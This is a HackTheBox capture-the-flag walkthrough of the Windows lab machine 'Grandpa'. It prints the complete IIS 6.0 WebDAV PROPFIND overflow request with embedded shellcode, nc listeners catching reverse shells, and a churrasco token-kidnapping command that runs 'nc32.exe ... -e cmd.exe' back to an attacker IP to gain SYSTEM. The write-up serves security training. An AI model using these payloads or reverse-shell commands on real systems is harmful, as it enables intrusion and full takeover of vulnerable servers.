HackTheBox: Grandpa
windows webdav token-kidnapping windows-exploit-suggesterGrandpa is a Windows-based machine authored by ch4p, with an average rating of 3.6 stars.
// Recon
┌──(kali㉿kali)-[~/HTB/grandpa]
└─$ nmap -A -p- grandpa.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 09:29 AEST
Nmap scan report for grandpa.htb (10.10.10.14)
Host is up (0.036s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Date: Tue, 12 Jul 2022 23:35:44 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
|_ Server Type: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 379.39 seconds
Similar to the recently completed Granny, the target is running an unknown version of Windows and IIS 6.0, with WebDAV enabled. Unlike Granny, however, this target does not appear to allow unauthenticated use of the WebDAV methods:
┌──(kali㉿kali)-[~/HTB/grandpa]
└─$ davtest -url http://grandpa.htb
********************************************************
Testing DAV connection
OPEN SUCCEED: http://grandpa.htb
********************************************************
NOTE Random string for this session: WqHElxZozGL
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT php FAIL
PUT cfm FAIL
PUT pl FAIL
PUT txt FAIL
PUT aspx FAIL
PUT cgi FAIL
PUT jhtml FAIL
PUT shtml FAIL
PUT html FAIL
PUT jsp FAIL
PUT asp FAIL
********************************************************
/usr/bin/davtest Summary:
// Initial Foothold
The target does however appear vulnerable to the same buffer overflow exploit as Granny, meaning a reverse shell can be initiated by sending an unexpectedly long If: header as part of a PROPFIND method:
# sending the exploit
┌──(kali㉿kali)-[~/github/g0rx/iis6-exploit-2017-CVE-2017-7269]
└─$ python2 iis6_reverse_shell.py grandpa.htb 80 10.10.17.230 443
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>
# catching a shell
┌──(kali㉿kali)-[~/HTB/grandpa]
└─$ nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.14 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
Given exactly the same exploit has worked on two very similar machines, it’s likely the exploit was intended for use on this machine and not Granny, which did allow unauthenticated WebDAV access and didn’t really require any exploit at all.
Again, our initial access does not provide access to the directory where the user flag will likely be:
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:12 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 05:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 1,313,607,680 bytes free
C:\Documents and Settings>cd Harry
cd Harry
Access is denied.
Again like Granny, this target is vulnerable to the token kidnapping local privesc attack, allowing for a system-level reverse shell to be created:
C:\WINDOWS\Temp>.\churrasco.exe -d "C:\windows\temp\nc32.exe 10.10.17.230 446 -e C:\windows\system32\cmd.exe"
.\churrasco.exe -d "C:\windows\temp\nc32.exe 10.10.17.230 446 -e C:\windows\system32\cmd.exe"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x718
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x710
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
C:\WINDOWS\Temp>
# listener
┌──(kali㉿kali)-[~/HTB/grandpa]
└─$ nc -lvnp 446
Listening on 0.0.0.0 446
Connection received on 10.10.10.14 1040
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
Windows Exploit Suggester does find a number of other potential vulnerabilities that might allow for privilege escalation, but the majority of these require similar execution (uploading and running a pre-built binary) so aren’t worth exploring further.
As the system user, both user and root flags can now be retrieved as usual:
C:\WINDOWS\TEMP>cd C:\"Documents and Settings"
cd C:\"Documents and Settings"
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings
04/12/2017 05:32 PM <DIR> .
04/12/2017 05:32 PM <DIR> ..
04/12/2017 05:12 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 05:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 1,306,390,528 bytes free
C:\Documents and Settings>type Harry\Desktop\user.txt
type Harry\Desktop\user.txt
bdff5***************************
C:\Documents and Settings>type Administrator\Desktop\root.txt
type Administrator\Desktop\root.txt
9359e***************************
